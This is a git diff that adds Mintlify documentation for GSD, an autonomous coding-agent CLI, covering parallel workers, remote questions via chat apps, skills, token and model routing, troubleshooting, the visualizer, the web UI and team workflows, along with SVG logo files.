+1. Enable in preferences:
+
+```yaml
+parallel:
+  enabled: true
+  max_workers: 2
+```
+
+2. Start parallel execution:
+
+```
+/gsd parallel start
+```
+
+3. Monitor progress:
+
+```
+/gsd parallel status
+```
+
+## Architecture
+
+```
+┌─────────────────────────────────────────────────────┐
+│  Coordinator (your GSD session)                      │
+│                                                      │
+│  ┌──────────┐  ┌──────────┐  ┌──────────┐           │
+│  │ Worker 1 │  │ Worker 2 │  │ Worker 3 │  ...       │
+│  │ M001     │  │ M003     │  │ M005     │           │
+│  └──────────┘  └──────────┘  └──────────┘           │
+│       │              │              │                │
+│       ▼              ▼              ▼                │
+│  .gsd/worktrees/ .gsd/worktrees/ .gsd/worktrees/    │
+└─────────────────────────────────────────────────────┘
+```
+
+### Worker isolation
+
+| Resource | Isolation method |
+|----------|-----------------|
+| Filesystem | Git worktree — separate checkout |
+| Git branch | `milestone/<MID>` per milestone |
+| State | `GSD_MILESTONE_LOCK` — each worker sees only its milestone |
+| Context | Separate process with its own agent sessions |
+| Metrics | Each worktree has its own `metrics.json` |
+
+## Eligibility analysis
+
+Before starting, GSD checks which milestones can run concurrently:
+
+1. **Not complete** — finished milestones are skipped
+2. **Dependencies satisfied** — all `dependsOn` entries must be complete
+3. **File overlap check** — shared files get a warning (not a blocker)
+
+## Configuration
+
+```yaml
+parallel:
+  enabled: false
+  max_workers: 2
+  budget_ceiling: 50.00
+  merge_strategy: "per-milestone"    # or "per-slice"
+  auto_merge: "confirm"              # "auto", "confirm", or "manual"
+```
+
+| Key | Default | Description |
+|-----|---------|-------------|
+| `enabled` | `false` | Master toggle |
+| `max_workers` | `2` | Concurrent workers (1-4) |
+| `budget_ceiling` | none | Aggregate cost limit across all workers |
+| `merge_strategy` | `"per-milestone"` | When to merge back to main |
+| `auto_merge` | `"confirm"` | How merge-back is handled |
+
+## Commands
+
+| Command | Description |
+|---------|-------------|
+| `/gsd parallel start` | Analyze, confirm, and start workers |
+| `/gsd parallel status` | Show workers with state, progress, cost |
+| `/gsd parallel stop [MID]` | Stop all or a specific worker |
+| `/gsd parallel pause [MID]` | Pause all or a specific worker |
+| `/gsd parallel resume [MID]` | Resume paused workers |
+| `/gsd parallel merge [MID]` | Merge completed milestones to main |
+
+## Merge reconciliation
+
+- `.gsd/` state files — auto-resolved (accept milestone branch version)
+- Code conflicts — merge halts, shows conflicting files. Resolve manually and retry.
+
+## Budget management
+
+When `budget_ceiling` is set, aggregate cost is tracked across all workers. Ceiling reached → coordinator signals workers to stop.
+
+## Troubleshooting
+
+### "No milestones are eligible"
+
+All milestones are complete or blocked by dependencies. Check `/gsd queue`.
+
+### Worker crashed
+
+Workers persist state to disk. On restart, the coordinator detects dead PIDs. Run `/gsd doctor --fix` to clean up, then `/gsd parallel start` to spawn new workers.
+
+### Merge conflicts
+
+```
+/gsd parallel merge       # see which milestones conflict
+# resolve in .gsd/worktrees/<MID>/
+/gsd parallel merge MID   # retry
+```
diff --git a/mintlify-docs/guides/remote-questions.mdx b/mintlify-docs/guides/remote-questions.mdx
new file mode 100644
index 000000000..a21ac9ea8
--- /dev/null
+++ b/mintlify-docs/guides/remote-questions.mdx
@@ -0,0 +1,84 @@
+---
+title: "Remote questions"
+description: "Discord, Slack, and Telegram integration for headless auto-mode."
+---
+
+Remote questions allow GSD to ask for user input via Slack, Discord, or Telegram when running in headless auto-mode. When GSD encounters a decision point, it posts the question to your configured channel and polls for a response.
+
+## Setup
+
+<Tabs>
+  <Tab title="Discord">
+    ```
+    /gsd remote discord
+    ```
+
+    The setup wizard validates your bot token, picks a server and channel, sends a test message, and saves the config.
+
+    **Bot requirements:**
+    - A Discord bot token from the [Developer Portal](https://discord.com/developers/applications)
+    - Permissions: Send Messages, Read Message History, Add Reactions, View Channel
+  </Tab>
+  <Tab title="Slack">
+    ```
+    /gsd remote slack
+    ```
+
+    The setup wizard validates your bot token, picks a channel, sends a test message, and saves the config.
+
+    **Bot requirements:**
+    - A Slack bot token (`xoxb-...`) from [Slack API](https://api.slack.com/apps)
+    - Scopes: `chat:write`, `reactions:read`, `reactions:write`, `channels:read`, `groups:read`, `channels:history`, `groups:history`
+  </Tab>
+  <Tab title="Telegram">
+    ```
+    /gsd remote telegram
+    ```
+
+    The setup wizard validates your bot token, prompts for a chat ID, sends a test message, and saves the config.
+
+    **Bot requirements:**
+    - A bot token from [@BotFather](https://t.me/BotFather)
+    - Bot must be added to the target group chat
+  </Tab>
+</Tabs>
+
+## Configuration
+
+```yaml
+remote_questions:
+  channel: discord
+  channel_id: "1234567890123456789"
+  timeout_minutes: 5
+  poll_interval_seconds: 5
+```
+
+## How it works
+
+1. GSD encounters a decision point during auto-mode
+2. The question is posted to your channel as a rich embed (Discord) or Block Kit message (Slack)
+3. GSD polls for a response at the configured interval
+4. You respond by reacting with a number emoji or replying with text
+5. GSD picks up the response and continues
+6. A check reaction confirms receipt
+
+### Response formats
+
+**Single question:** React with a number emoji (1️⃣-5️⃣) or reply with a number.
+
+**Multiple questions:** Reply with semicolons (`1;2;custom text`) or one answer per line.
+
+### Timeouts
+
+If no response within `timeout_minutes`, the LLM makes a conservative default choice or pauses auto-mode.
+
+## Commands
+
+| Command | Description |
+|---------|-------------|
+| `/gsd remote` | Show menu and current status |
+| `/gsd remote slack` | Set up Slack |
+| `/gsd remote discord` | Set up Discord |
+| `/gsd remote telegram` | Set up Telegram |
+| `/gsd remote status` | Show current config and last prompt status |
+| `/gsd remote disconnect` | Remove configuration |
diff --git a/mintlify-docs/guides/skills.mdx b/mintlify-docs/guides/skills.mdx
new file mode 100644
index 000000000..66a05b096
--- /dev/null
+++ b/mintlify-docs/guides/skills.mdx
@@ -0,0 +1,97 @@
+---
+title: "Skills"
+description: "Specialized instruction sets that provide domain-specific guidance to the LLM."
+---
+
+Skills are specialized instruction sets that GSD loads when the task matches. They provide domain-specific guidance — coding patterns, framework idioms, testing strategies, and tool usage.
+
+## Bundled skills
+
+GSD ships with these skills, installed to `~/.gsd/agent/skills/`:
+
+| Skill | Trigger | Description |
+|-------|---------|-------------|
+| `frontend-design` | Web UI work | Production-grade frontend with high design quality |
+| `swiftui` | macOS/iOS apps | Full lifecycle from creation to shipping |
+| `debug-like-expert` | Complex debugging | Methodical investigation with evidence gathering |
+| `rust-core` | Rust code | Idiomatic, safe, performant Rust patterns |
+| `axum-web-framework` | Axum web apps | Complete Axum development guide |
+| `tauri` | Tauri v2 desktop apps | Cross-platform desktop development |
+| `github-workflows` | GitHub Actions | CI/CD, workflow debugging |
+| `security-audit` | Security auditing | Dependency scanning, OWASP |
+| `review` | Code review | Diff-aware quality analysis |
+| `test` | Test generation | Auto-detects frameworks |
+| `lint` | Linting and formatting | ESLint, Biome, Prettier |
+
+## Skill discovery
+
+The `skill_discovery` preference controls how GSD finds skills:
+
+| Mode | Behavior |
+|------|----------|
+| `auto` | Skills found and applied automatically |
+| `suggest` | Skills identified but require confirmation (default) |
+| `off` | No skill discovery |
+
+## Skill preferences
+
+```yaml
+always_use_skills:
+  - debug-like-expert
+prefer_skills:
+  - frontend-design
+avoid_skills:
+  - security-docker
+skill_rules:
+  - when: task involves Clerk authentication
+    use: [clerk]
+  - when: frontend styling work
+    prefer: [frontend-design]
+```
+
+### Resolution order
+
+1. **Bare name** — e.g., `frontend-design` → scans `~/.gsd/agent/skills/` and project skills
+2. **Absolute path** — e.g., `/Users/you/.gsd/agent/skills/my-skill/SKILL.md`
+3. **Directory path** — looks for `SKILL.md` inside
+
+User skills take precedence over project skills.
+
+## Custom skills
+
+Create a directory with a `SKILL.md` file:
+
+```
+~/.gsd/agent/skills/my-skill/
+  SKILL.md           — instructions for the LLM
+  references/        — optional reference files
+```
+
+### Project-local skills
+
+```
+.gsd/agent/skills/my-project-skill/
+  SKILL.md
+```
+
+## Skill health dashboard
+
+```
+/gsd skill-health              # overview table
+/gsd skill-health rust-core    # detailed view
+/gsd skill-health --stale 30   # unused for 30+ days
+/gsd skill-health --declining  # falling success rates
+```
+
+The dashboard flags:
+- Success rate below 70% over the last 10 uses
+- Token usage rising 20%+
+- Skills unused beyond the staleness threshold
+
+### Staleness detection
+
+```yaml
+skill_staleness_days: 60    # default: 60, set 0 to disable
+```
+
+Stale skills are excluded from automatic matching but remain invokable explicitly.
diff --git a/mintlify-docs/guides/token-optimization.mdx b/mintlify-docs/guides/token-optimization.mdx
new file mode 100644
index 000000000..ae79bf525
--- /dev/null
+++ b/mintlify-docs/guides/token-optimization.mdx
@@ -0,0 +1,175 @@
+---
+title: "Token optimization"
+description: "Token profiles, context compression, and complexity-based task routing to reduce costs by 40-60%."
+---
+
+GSD's token optimization system has three pillars: **token profiles**, **context compression**, and **complexity-based task routing**.
+
+## Token profiles
+
+A token profile coordinates model selection, phase skipping, and context compression. Set it in preferences:
+
+```yaml
+token_profile: balanced
+```
+
+### `budget` — maximum savings (40-60% reduction)
+
+| Dimension | Setting |
+|-----------|---------|
+| Planning model | Sonnet |
+| Execution model | Sonnet |
+| Simple task model | Haiku |
+| Completion model | Haiku |
+| Milestone research | Skipped |
+| Slice research | Skipped |
+| Reassessment | Skipped |
+| Context level | Minimal |
+
+Best for: prototyping, small projects, well-understood codebases.
+
+### `balanced` — smart defaults
+
+| Dimension | Setting |
+|-----------|---------|
+| All models | User's default |
+| Subagent model | Sonnet |
+| Milestone research | Runs |
+| Slice research | Skipped |
+| Reassessment | Runs |
+| Context level | Standard |
+
+Best for: most projects, day-to-day development.
+
+### `quality` — full context
+
+Every phase runs. Every context artifact is inlined. No shortcuts. Best for: complex architectures, greenfield projects, critical production work.
+
+## Context compression
+
+Each profile maps to an **inline level** controlling how much context is pre-loaded into dispatch prompts:
+
+| Profile | Level | What's included |
+|---------|-------|-----------------|
+| `budget` | Minimal | Task plan, essential prior summaries (truncated). Drops decisions, requirements, templates. |
+| `balanced` | Standard | Task plan, prior summaries, slice plan, roadmap excerpt. |
+| `quality` | Full | Everything — all plans, summaries, decisions, requirements, templates. |
+
+### Prompt compression
+
+GSD can apply deterministic text compression before falling back to section-boundary truncation:
+
+```yaml
+compression_strategy: compress    # or "truncate"
+```
+
+| Strategy | Behavior | Default for |
+|----------|----------|------------|
+| `truncate` | Drop entire sections at boundaries | `quality` |
+| `compress` | Heuristic text compression first, then truncate | `budget`, `balanced` |
+
+### Context selection
+
+```yaml
+context_selection: smart    # or "full"
+```
+
+| Mode | Behavior | Default for |
+|------|----------|------------|
+| `full` | Inline entire files | `balanced`, `quality` |
+| `smart` | TF-IDF semantic chunking for large files | `budget` |
+
+## Complexity-based task routing
+
+GSD classifies each task by complexity and routes it to an appropriate model tier.
+
+<Warning>
+Dynamic routing requires explicit `models` in your preferences. Without a `models` section, routing is skipped.
+</Warning>
+
+### Classification signals
+
+| Signal | Simple | Standard | Complex |
+|--------|--------|----------|---------|
+| Step count | ≤ 3 | 4-7 | ≥ 8 |
+| File count | ≤ 3 | 4-7 | ≥ 8 |
+| Description length | < 500 chars | 500-2000 | > 2000 chars |
+| Code blocks | — | — | ≥ 5 |
+| Complexity keywords | None | Any present | — |
+
+**Complexity keywords:** `research`, `investigate`, `refactor`, `migrate`, `integrate`, `complex`, `architect`, `redesign`, `security`, `performance`, `concurrent`, `parallel`
+
+### Budget pressure
+
+When approaching the budget ceiling, the classifier automatically downgrades tiers:
+
+| Budget used | Effect |
+|------------|--------|
+| < 50% | No adjustment |
+| 50-75% | Standard → Light |
+| 75-90% | More aggressive |
+| > 90% | Everything except Heavy → Light |
+
+## Adaptive learning
+
+GSD tracks success/failure per tier and adjusts classifications over time. User feedback via `/gsd rate` is weighted 2x:
+
+```
+/gsd rate over    # model was overpowered
+/gsd rate ok      # appropriate
+/gsd rate under   # too weak
+```
+
+## Configuration examples
+
+<Tabs>
+  <Tab title="Cost-optimized">
+    ```yaml
+    ---
+    version: 1
+    token_profile: budget
+    budget_ceiling: 25.00
+    models:
+      execution_simple: claude-haiku-4-5-20250414
+    ---
+    ```
+  </Tab>
+  <Tab title="Balanced with custom models">
+    ```yaml
+    ---
+    version: 1
+    token_profile: balanced
+    models:
+      planning:
+        model: claude-opus-4-6
+        fallbacks:
+          - openrouter/z-ai/glm-5
+      execution: claude-sonnet-4-6
+    ---
+    ```
+  </Tab>
+  <Tab title="Full quality">
+    ```yaml
+    ---
+    version: 1
+    token_profile: quality
+    models:
+      planning: claude-opus-4-6
+      execution: claude-opus-4-6
+    ---
+    ```
+  </Tab>
+</Tabs>
+
+Per-phase overrides always win over profile defaults:
+
+```yaml
+---
+version: 1
+token_profile: budget
+phases:
+  skip_research: false       # keep research despite budget profile
+models:
+  planning: claude-opus-4-6  # use Opus for planning despite budget
+---
+```
diff --git a/mintlify-docs/guides/troubleshooting.mdx b/mintlify-docs/guides/troubleshooting.mdx
new file mode 100644
index 000000000..a95cd8557
--- /dev/null
+++ b/mintlify-docs/guides/troubleshooting.mdx
@@ -0,0 +1,158 @@
+---
+title: "Troubleshooting"
+description: "Common issues, /gsd doctor, /gsd forensics, and recovery procedures."
+---
+
+## `/gsd doctor`
+
+The built-in diagnostic tool validates `.gsd/` integrity:
+
+```
+/gsd doctor
+```
+
+It checks file structure, referential integrity, completion state consistency, git worktree health, and stale lock files.
+
+## Common issues
+
+<AccordionGroup>
+  <Accordion title="Auto mode loops on the same unit">
+    **Cause:** Stale cache after a crash, or the LLM didn't produce the expected artifact.
+
+    **Fix:** Run `/gsd doctor` to repair state, then `/gsd auto`.
+  </Accordion>
+
+  <Accordion title="Auto mode stops with 'Loop detected'">
+    **Cause:** A unit failed to produce its expected artifact twice in a row.
+
+    **Fix:** Check the task plan for clarity. Refine it manually, then `/gsd auto`.
+  </Accordion>
+
+  <Accordion title="command not found: gsd">
+    **Cause:** npm's global bin directory isn't in `$PATH`.
+
+    **Fix:**
+    ```bash
+    npm prefix -g
+    echo 'export PATH="$(npm prefix -g)/bin:$PATH"' >> ~/.zshrc
+    source ~/.zshrc
+    ```
+
+    **Workaround:** `npx gsd-pi` or `$(npm prefix -g)/bin/gsd`
+  </Accordion>
+
+  <Accordion title="Provider errors during auto mode">
+    | Error type | Auto-resume? | Delay |
+    |-----------|-------------|-------|
+    | Rate limit (429) | Yes | retry-after or 60s |
+    | Server error (500, 502, 503) | Yes | 30s |
+    | Auth/billing | No | Manual resume |
+
+    For transient errors, configure fallback models:
+    ```yaml
+    models:
+      execution:
+        model: claude-sonnet-4-6
+        fallbacks:
+          - openrouter/minimax/minimax-m2.5
+    ```
+  </Accordion>
+
+  <Accordion title="Budget ceiling reached">
+    Increase `budget_ceiling` in preferences, or switch to `budget` token profile. Resume with `/gsd auto`.
+  </Accordion>
+
+  <Accordion title="Stale lock file">
+    GSD auto-detects stale locks. If automatic recovery fails:
+    ```bash
+    rm -f .gsd/auto.lock
+    rm -rf "$(dirname .gsd)/.gsd.lock"
+    ```
+  </Accordion>
+
+  <Accordion title="Git merge conflicts on .gsd/ files">
+    GSD auto-resolves conflicts on `.gsd/` runtime files. For code conflicts, the LLM attempts resolution. If that fails, resolve manually.
+  </Accordion>
+
+  <Accordion title="EBUSY / EPERM / EACCES on Windows">
+    **Cause:** Antivirus, indexers, or editors briefly locking files during atomic rename.
+
+    **Fix:** Re-run the operation. Close tools holding files open if the error persists. Run `/gsd doctor` to verify repo health.
+  </Accordion>
+
+  <Accordion title="Worktree isolation stopped working after upgrade to v2.45+">
+    **Cause:** The default `git.isolation` mode changed from `worktree` to `none` in v2.45.0.
+
+    **Fix:** Set `git.isolation: worktree` explicitly in your preferences:
+    ```yaml
+    git:
+      isolation: worktree
+    ```
+  </Accordion>
+
+  <Accordion title="Node.js version or git not found at startup">
+    **Cause:** GSD v2.45+ checks for Node.js >= 22 and git availability at startup.
+
+    **Fix:** Install Node.js 22+ (24 LTS recommended) and ensure `git` is in your PATH.
+  </Accordion>
+</AccordionGroup>
+
+## `/gsd forensics`
+
+Full-access debugger for post-mortem analysis:
+
+```
+/gsd forensics [optional problem description]
+```
+
+Provides anomaly detection, unit traces, metrics analysis, doctor integration, and LLM-guided investigation.
+
+## MCP client issues
+
+Use `/gsd mcp` to check MCP server status and connectivity at a glance.
+
+<AccordionGroup>
+  <Accordion title="No configured servers">
+    Verify `.mcp.json` or `.gsd/mcp.json` exists and parses as valid JSON.
+  </Accordion>
+
+  <Accordion title="mcp_discover times out">
+    Run the configured command outside GSD to confirm the server starts. Check backend URLs and dependencies.
+  </Accordion>
+
+  <Accordion title="Local server works manually but not in GSD">
+    Use absolute paths. Set required environment variables in the MCP config's `env` block.
+  </Accordion>
+</AccordionGroup>
+
+## Recovery procedures
+
+### Reset auto mode state
+
+```bash
+rm .gsd/auto.lock
+rm .gsd/completed-units.json
+```
+
+Then `/gsd auto` to restart from current disk state.
+
+### Reset routing history
+
+```bash
+rm .gsd/routing-history.json
+```
+
+### Full state rebuild
+
+```
+/gsd doctor
+```
+
+Rebuilds `STATE.md` from plan and roadmap files on disk.
+
+## Getting help
+
+- **GitHub Issues:** [github.com/gsd-build/GSD-2/issues](https://github.com/gsd-build/gsd-2/issues)
+- **Dashboard:** `Ctrl+Alt+G` or `/gsd status`
+- **Forensics:** `/gsd forensics`
+- **Session logs:** `.gsd/activity/`
diff --git a/mintlify-docs/guides/visualizer.mdx b/mintlify-docs/guides/visualizer.mdx
new file mode 100644
index 000000000..5ea199621
--- /dev/null
+++ b/mintlify-docs/guides/visualizer.mdx
@@ -0,0 +1,82 @@
+---
+title: "Workflow visualizer"
+description: "Interactive TUI overlay for progress, dependencies, metrics, and timeline."
+---
+
+The workflow visualizer is a full-screen TUI overlay with four tabs showing project progress, dependencies, cost metrics, and execution timeline.
+
+## Opening
+
+```
+/gsd visualize
+```
+
+Or configure automatic display after milestone completion:
+
+```yaml
+auto_visualize: true
+```
+
+## Tabs
+
+Switch tabs with `Tab`, `1`-`4`, or arrow keys.
+
+### 1. Progress
+
+A tree view of milestones, slices, and tasks with completion status:
+
+```
+M001: User Management                        3/6 tasks ⏳
+  ✅ S01: Auth module                         3/3 tasks
+    ✅ T01: Core types
+    ✅ T02: JWT middleware
+    ✅ T03: Login flow
+  ⏳ S02: User dashboard                      1/2 tasks
+    ✅ T01: Layout component
+    ⬜ T02: Profile page
+```
+
+### 2. Dependencies
+
+ASCII dependency graph showing slice relationships:
+
+```
+S01 ──→ S02 ──→ S04
+  └───→ S03 ──↗
+```
+
+### 3. Metrics
+
+Bar charts showing cost and token usage by phase, slice, and model.
+
+### 4. Timeline
+
+Chronological execution history with unit type, timestamps, duration, model, and token counts.
+
+## Controls
+
+| Key | Action |
+|-----|--------|
+| `Tab` | Next tab |
+| `Shift+Tab` | Previous tab |
+| `1`-`4` | Jump to tab |
+| `↑`/`↓` | Scroll |
+| `Escape` / `q` | Close |
+
+The visualizer refreshes from disk every 2 seconds, staying current alongside a running auto-mode session.
+
+## HTML export
+
+For shareable reports outside the terminal:
+
+```
+/gsd export --html
+```
+
+Generates a self-contained HTML file in `.gsd/reports/` with progress tree, dependency graph (SVG), cost/token charts, execution timeline, and changelog. All CSS and JS are inlined — printable to PDF from any browser.
+
+```yaml
+auto_report: true    # auto-generate after milestone completion (default)
+```
+
+An auto-generated `index.html` shows all reports with progression metrics across milestones.
diff --git a/mintlify-docs/guides/web-interface.mdx b/mintlify-docs/guides/web-interface.mdx
new file mode 100644
index 000000000..75f769c86
--- /dev/null
+++ b/mintlify-docs/guides/web-interface.mdx
@@ -0,0 +1,38 @@
+---
+title: "Web interface"
+description: "Browser-based project management with real-time progress and multi-project support."
+---
+
+GSD includes a browser-based web interface for project management, real-time progress monitoring, and multi-project support.
+
+## Quick start
+
+```bash
+gsd --web
+```
+
+### CLI flags
+
+```bash
+gsd --web --host 0.0.0.0 --port 8080 --allowed-origins "https://example.com"
+```
+
+| Flag | Default | Description |
+|------|---------|-------------|
+| `--host` | `localhost` | Bind address |
+| `--port` | `3000` | Port |
+| `--allowed-origins` | (none) | Comma-separated CORS origins |
+
+## Features
+
+- **Project management** — view milestones, slices, and tasks in a visual dashboard
+- **Real-time progress** — server-sent events push status updates during auto-mode
+- **Multi-project support** — manage multiple projects from a single tab via `?project=` URL parameter
+- **Change project root** — switch directories from the web UI without restarting
+- **Onboarding flow** — API key setup and provider configuration through the browser
+- **Model selection** — switch models and providers from the web UI
+
+## Platform notes
+
+- **macOS/Linux** — full support
+- **Windows** — web build is skipped due to Next.js webpack issues. The CLI remains fully functional.
diff --git a/mintlify-docs/guides/working-in-teams.mdx b/mintlify-docs/guides/working-in-teams.mdx
new file mode 100644
index 000000000..72baa19e2
--- /dev/null
+++ b/mintlify-docs/guides/working-in-teams.mdx
@@ -0,0 +1,72 @@
+---
+title: "Working in teams"
+description: "Multi-user workflows with unique milestone IDs, push branches, and shared planning artifacts."
+---
+
+GSD supports multi-user workflows where several developers work on the same repository concurrently.
+
+## Setup
+
+### 1. Set team mode
+
+```yaml
+# .gsd/PREFERENCES.md (project-level, committed to git)
+---
+version: 1
+mode: team
+---
+```
+
+This enables unique milestone IDs, push branches, and pre-merge checks in one setting. Override individual settings on top of `mode: team` as needed.
+
+### 2. Configure `.gitignore`
+
+Share planning artifacts while keeping runtime files local:
+
+```bash
+# Runtime / ephemeral (per-developer)
+.gsd/auto.lock
+.gsd/completed-units.json
+.gsd/STATE.md
+.gsd/metrics.json
+.gsd/activity/
+.gsd/runtime/
+.gsd/worktrees/
+.gsd/milestones/**/continue.md
+.gsd/milestones/**/*-CONTINUE.md
+```
+
+**Shared** (committed): preferences, PROJECT.md, REQUIREMENTS.md, DECISIONS.md, milestones.
+
+**Local** (gitignored): lock files, metrics, state cache, worktrees, activity logs.
+
+### 3. Commit
+
+```bash
+git add .gsd/PREFERENCES.md
+git commit -m "chore: enable GSD team workflow"
+```
+
+## `commit_docs: false`
+
+For teams where only some members use GSD:
+
+```yaml
+git:
+  commit_docs: false
+```
+
+Adds `.gsd/` to `.gitignore` entirely. The developer gets structured planning without affecting teammates.
+
+## Parallel development
+
+Multiple developers run auto mode simultaneously on different milestones. Each developer gets their own worktree and unique `milestone/<MID>` branch. Milestone dependencies can be declared:
+
+```yaml
+# M00X-CONTEXT.md frontmatter
+---
+depends_on: [M001-eh88as]
+---
+```
+
+GSD enforces that dependent milestones complete before starting downstream work.
diff --git a/mintlify-docs/images/favicon.svg b/mintlify-docs/images/favicon.svg
new file mode 100644
index 000000000..90071ea65
--- /dev/null
+++ b/mintlify-docs/images/favicon.svg
@@ -0,0 +1,68 @@
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 960 540">
+  <defs>
+    <style>
+      .terminal-bg { fill: #1a1b26; }
+      .terminal-border { fill: #24283b; }
+      .title-bar { fill: #1f2335; }
+      .btn-red { fill: #f7768e; }
+      .btn-yellow { fill: #e0af68; }
+      .btn-green { fill: #9ece6a; }
+      .text { font-family: 'SF Mono', 'Fira Code', 'JetBrains Mono', Consolas, monospace; }
+      .prompt { fill: #7aa2f7; }
+      .command { fill: #c0caf5; }
+      .cyan { fill: #7dcfff; }
+      .green { fill: #9ece6a; }
+      .dim { fill: #565f89; }
+      .white { fill: #c0caf5; }
+    </style>
+  </defs>
+
+  <!-- Window -->
+  <rect class="terminal-border" width="960" height="540" rx="12"/>
+  <rect class="terminal-bg" x="1" y="1" width="958" height="538" rx="11"/>
+
+  <!-- Title bar -->
+  <rect class="title-bar" x="1" y="1" width="958" height="36" rx="11"/>
+  <rect class="terminal-bg" x="1" y="26" width="958" height="12"/>
+
+  <!-- Window buttons -->
+  <circle class="btn-red" cx="24" cy="19" r="7"/>
+  <circle class="btn-yellow" cx="48" cy="19" r="7"/>
+  <circle class="btn-green" cx="72" cy="19" r="7"/>
+
+  <!-- Title -->
+  <text x="480" y="24" text-anchor="middle" class="text dim" font-size="13">Terminal</text>
+
+  <!-- Content -->
+  <g transform="translate(32, 72)">
+    <!-- Prompt line -->
+    <text class="text prompt" font-size="15" y="0">~</text>
+    <text class="text dim" font-size="15" x="16" y="0">$</text>
+    <text class="text command" font-size="15" x="36" y="0">npx get-shit-done-cc</text>
+
+    <!-- Banner -->
+    <text class="text cyan" font-size="14" y="48" xml:space="preserve">   ██████╗ ███████╗██████╗</text>
+    <text class="text cyan" font-size="14" y="68" xml:space="preserve">  ██╔════╝ ██╔════╝██╔══██╗</text>
+    <text class="text cyan" font-size="14" y="88" xml:space="preserve">  ██║  ███╗███████╗██║  ██║</text>
+    <text class="text cyan" font-size="14" y="108" xml:space="preserve">  ██║   ██║╚════██║██║  ██║</text>
+    <text class="text cyan" font-size="14" y="128" xml:space="preserve">  ╚██████╔╝███████║██████╔╝</text>
+    <text class="text cyan" font-size="14" y="148" xml:space="preserve">   ╚═════╝ ╚══════╝╚═════╝</text>
+
+    <!-- Title and subtitle -->
+    <text class="text white" font-size="15" y="188">  Get Shit Done <tspan class="dim">v1.0.1</tspan></text>
+    <text class="text white" font-size="15" y="212">  A meta-prompting, context engineering and spec-driven</text>
+    <text class="text white" font-size="15" y="232">  development system for Claude Code by TÂCHES.</text>
+
+    <!-- Install output -->
+    <text class="text" font-size="15" y="280"><tspan class="green">  ✓</tspan><tspan class="white"> Installed commands/gsd</tspan></text>
+    <text class="text" font-size="15" y="304"><tspan class="green">  ✓</tspan><tspan class="white"> Installed get-shit-done</tspan></text>
+
+    <!-- Done message -->
+    <text class="text" font-size="15" y="352"><tspan class="green">  Done!</tspan><tspan class="white"> Run </tspan><tspan class="cyan">/gsd:help</tspan><tspan class="white"> to get started.</tspan></text>
+
+    <!-- New prompt -->
+    <text class="text prompt" font-size="15" y="400">~</text>
+    <text class="text dim" font-size="15" x="16" y="400">$</text>
+    <text class="text white" font-size="15" x="36" y="400">▌</text>
+  </g>
+</svg>
diff --git a/mintlify-docs/images/logo.png b/mintlify-docs/images/logo.png
new file mode 100644
index 000000000..b4584cc6a
Binary files /dev/null and b/mintlify-docs/images/logo.png differ
diff --git a/mintlify-docs/images/logo.svg b/mintlify-docs/images/logo.svg
new file mode 100644
index 000000000..d9f61c16e
--- /dev/null
+++ b/mintlify-docs/images/logo.svg
@@ -0,0 +1,17 @@
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 2000 2000" width="2000" height="2000">
+  <defs>
+    <style>
+      .logo { font-family: 'SF Mono', 'Fira Code', 'JetBrains Mono', 'Courier New', monospace; fill: #7dcfff; }
+    </style>
+  </defs>
+
+  <!-- GSD ASCII Logo - centered -->
+  <g transform="translate(1000, 1000)">
+    <text class="logo" font-size="108" text-anchor="middle" y="-225" xml:space="preserve">  ██████╗ ███████╗██████╗ </text>
+    <text class="logo" font-size="108" text-anchor="middle" y="-105" xml:space="preserve"> ██╔════╝ ██╔════╝██╔══██╗</text>
+    <text class="logo" font-size="108" text-anchor="middle" y="15" xml:space="preserve"> ██║  ███╗███████╗██║  ██║</text>
+    <text class="logo" font-size="108" text-anchor="middle" y="135" xml:space="preserve"> ██║   ██║╚════██║██║  ██║</text>
+    <text class="logo" font-size="108" text-anchor="middle" y="255" xml:space="preserve"> ╚██████╔╝███████║██████╔╝</text>
+    <text class="logo" font-size="108" text-anchor="middle" y="375" xml:space="preserve">  ╚═════╝ ╚══════╝╚═════╝ </text>
+  </g>
+</svg>
diff --git a/mintlify-docs/introduction.mdx b/mintlify-docs/introduction.mdx
new file mode 100644
index 000000000..ea30b2d5d
--- /dev/null
+++ b/mintlify-docs/introduction.mdx
@@ -0,0 +1,101 @@
+---
+title: "GSD — Get Shit Done"
+description: "An autonomous coding agent that researches, plans, executes, and commits code while you focus on what matters."
+---
+
+GSD is an autonomous coding agent. Describe what you want built, run `/gsd auto`, and walk away. Come back to working software with clean git history.
+
+## What GSD does
+
+<CardGroup cols={2}>
+  <Card title="Autonomous execution" icon="robot">
+    A state machine reads your project state, dispatches work to an LLM in fresh context windows, and advances through research, planning, execution, and verification — all without manual intervention.
+  </Card>
+  <Card title="Clean git history" icon="code-branch">
+    Every task produces a conventional commit. Milestones are squash-merged to main. Your `git log` reads like a changelog.
+  </Card>
+  <Card title="Cost control" icon="gauge">
+    Budget ceilings, token profiles, and dynamic model routing keep costs in check. Use Haiku for simple tasks and Opus for architectural work — automatically.
+  </Card>
+  <Card title="Crash recovery" icon="rotate">
+    Sessions recover from crashes, provider errors auto-retry, and headless mode auto-restarts with exponential backoff. Designed for overnight unattended execution.
+  </Card>
+</CardGroup>
+
+## How it works
+
+GSD organizes work into a hierarchy:
+
+```
+Milestone  →  a shippable version (4-10 slices)
+  Slice    →  one demoable vertical capability (1-7 tasks)
+    Task   →  one context-window-sized unit of work
+```
+
+The iron rule: **a task must fit in one context window.** If it can't, it's two tasks.
+
+Auto mode loops through this hierarchy:
+
+```
+Plan → Execute (per task) → Complete → Reassess Roadmap → Next Slice
+                                                            ↓ (all slices done)
+                                                    Validate → Complete Milestone
+```
+
+Every phase gets a fresh context window with pre-loaded context — no accumulated garbage, no degraded quality.
+
+## Two ways to work
+
+<Tabs>
+  <Tab title="Step mode">
+    Type `/gsd` inside a session. GSD executes one unit at a time, pausing between each so you can review.
+
+    ```bash
+    gsd
+    /gsd
+    ```
+  </Tab>
+  <Tab title="Auto mode">
+    Type `/gsd auto` and walk away. GSD autonomously researches, plans, executes, verifies, and commits until the milestone is complete.
+
+    ```bash
+    gsd
+    /gsd auto
+    ```
+  </Tab>
+</Tabs>
+
+The recommended workflow: auto mode in one terminal, steering from another.
+
+**Terminal 1 — let it build:**
+
+```bash
+gsd
+/gsd auto
+```
+
+**Terminal 2 — steer while it works:**
+
+```bash
+gsd
+/gsd discuss    # talk through architecture decisions
+/gsd status     # check progress
+/gsd capture    # fire-and-forget thoughts
+```
+
+## Next steps
+
+<CardGroup cols={2}>
+  <Card title="Install GSD" icon="download" href="/getting-started">
+    Get up and running in under a minute.
